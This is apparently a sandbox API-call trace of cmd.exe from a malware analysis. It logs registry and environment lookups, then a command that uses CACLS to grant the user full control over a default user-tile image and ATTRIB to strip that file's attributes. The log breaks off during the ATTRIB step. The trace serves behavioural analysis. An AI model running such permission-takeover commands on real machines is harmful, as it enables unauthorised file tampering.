phkResult=0x22e6d4 | out: phkResult=0x22e6d4*=0x40) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0xb8, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x0, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegCloseKey (hKey=0x40) returned 0x0 [0186.854] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6d4 | out: phkResult=0x22e6d4*=0x40) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x0, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x9, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x9, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x9, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegCloseKey (hKey=0x40) returned 0x0 [0186.854] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0186.854] srand (_Seed=0x5b886395) [0186.854] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" [0186.854] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" [0186.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.855] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.855] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.855] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.855] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.855] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.855] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.855] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.855] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.855] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.855] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.855] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.855] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.856] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.856] GetEnvironmentStringsW () returned 0x2c2458* [0186.856] FreeEnvironmentStringsW (penv=0x2c2458) returned 1 [0186.856] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.856] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.856] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.856] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.856] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.856] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.856] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.856] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.856] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.856] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f4a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f4a0, lpFilePart=0x22f49c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f49c*="Desktop") returned 0x18 [0186.856] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.856] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0x2c0ae8 [0186.856] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0186.856] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0x2c0ae8 [0186.857] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0186.857] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0x2c0ae8 [0186.857] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0186.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.857] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.857] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.857] GetEnvironmentStringsW () returned 0x2c0308* [0186.857] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.857] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.857] GetConsoleOutputCP () returned 0x1b5 [0186.858] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.858] GetUserDefaultLCID () returned 0x409 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f5e0, cchData=128 | out: lpLCData="0") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f5e0, cchData=128 | out: lpLCData="0") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f5e0, cchData=128 | out: lpLCData="1") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.858] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.859] GetConsoleTitleW (in: lpConsoleTitle=0x2b09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.859] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.859] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.859] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.860] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.861] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.861] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.861] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.861] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.861] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.861] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.861] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.863] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.863] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.863] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.863] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.863] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.864] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.864] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.866] GetConsoleTitleW (in: lpConsoleTitle=0x22f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.872] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.872] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.872] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.872] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.872] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.872] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.872] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.872] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.872] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.872] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.872] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.872] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.872] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.872] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.872] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.872] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.872] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.872] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.872] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.872] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.872] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.872] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.872] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.872] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.872] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.872] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.873] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.873] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.873] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.873] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.873] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.873] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.873] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.873] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.873] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.873] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.873] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.873] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.873] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.873] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.873] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.874] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.874] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.874] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.874] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.874] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.874] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.874] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.874] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.874] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.874] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.874] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.874] SetErrorMode (uMode=0x0) returned 0x0 [0186.874] SetErrorMode (uMode=0x1) returned 0x0 [0186.874] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2c1e98, lpFilePart=0x22ed94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ed94*="Desktop") returned 0x18 [0186.874] SetErrorMode (uMode=0x0) returned 0x1 [0186.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.875] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.880] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.881] GetLastError () returned 0x2 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.881] GetLastError () returned 0x2 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2c2180 [0186.881] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.883] GetLastError () returned 0x2 [0186.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2c2180 [0186.884] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0186.884] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.884] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.884] GetConsoleTitleW (in: lpConsoleTitle=0x22f008, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.884] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef58 | out: lpAttributeList=0x22ee90, lpSize=0x22ef58) returned 1 [0186.884] UpdateProcThreadAttribute (in: lpAttributeList=0x22ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef50, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ee90, lpPreviousValue=0x0) returned 1 [0186.884] GetStartupInfoW (in: lpStartupInfo=0x22ee4c | out: lpStartupInfo=0x22ee4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.884] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.885] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eeec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ef38 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x22ef38*(hProcess=0x50, hThread=0x4c, dwProcessId=0x928, dwThreadId=0x45c)) returned 1 [0186.889] CloseHandle (hObject=0x4c) returned 1 [0186.889] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.889] GetEnvironmentStringsW () returned 0x2c0308* [0186.889] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.889] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.929] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22ee2c | out: lpExitCode=0x22ee2c*=0x0) returned 1 [0186.929] CloseHandle (hObject=0x50) returned 1 [0186.930] _vsnwprintf (in: _Buffer=0x22ef74, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee38 | out: _Buffer="00000000") returned 8 [0186.930] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.930] GetEnvironmentStringsW () returned 0x2c2410* [0186.930] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.930] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.930] GetEnvironmentStringsW () returned 0x2c2410* [0186.930] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.930] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ee90 | out: lpAttributeList=0x22ee90) [0186.930] GetConsoleTitleW (in: lpConsoleTitle=0x22f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.930] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.931] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.931] GetLastError () returned 0x2 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.931] GetLastError () returned 0x2 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2be4d8 